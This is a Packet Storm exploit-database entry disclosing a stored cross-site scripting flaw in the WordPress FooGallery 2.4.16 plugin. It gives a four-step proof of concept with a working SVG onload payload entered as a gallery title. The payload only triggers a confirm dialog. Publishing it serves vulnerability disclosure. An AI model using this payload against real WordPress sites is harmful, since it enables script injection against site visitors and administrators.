WordPress FooGallery 2.4.16 Cross Site Scripting ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

WordPress FooGallery 2.4.16 Cross Site Scripting[6]
Authored by tmrswrr[7]

WordPress FooGallery plugin version 2.4.16 suffers from a persistent cross site scripting vulnerability.

SHA-256 | b9f344160d5b9492eaa5c8a7c828dab1f4a547554b1f87ef5cdd39ece6f378c5

Change Mirror[11] Download[12]

        # Exploit Title: FooGallery version : 2.4.16 Stored XSS
# Date: 2024-07-02
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/foogallery/
# Version 2.4.16
### Steps to Execute the Payload:
1. **Click Add New Gallery**: [Add New Gallery](https://127.0.0.1/wp-admin/post-new.php?post_type=foogallery)
2. **Write Add Title your payload**: `"><sVg/onLy=1 onLoaD=confirm(1)//`
3. **Click Publish**, then click **Create Gallery Page**.
4. **Verify Execution**: You will see the payload executed in the usage field.

Login[13] or Register[14] to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services[119]
Hosting By
Rokasec[120]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"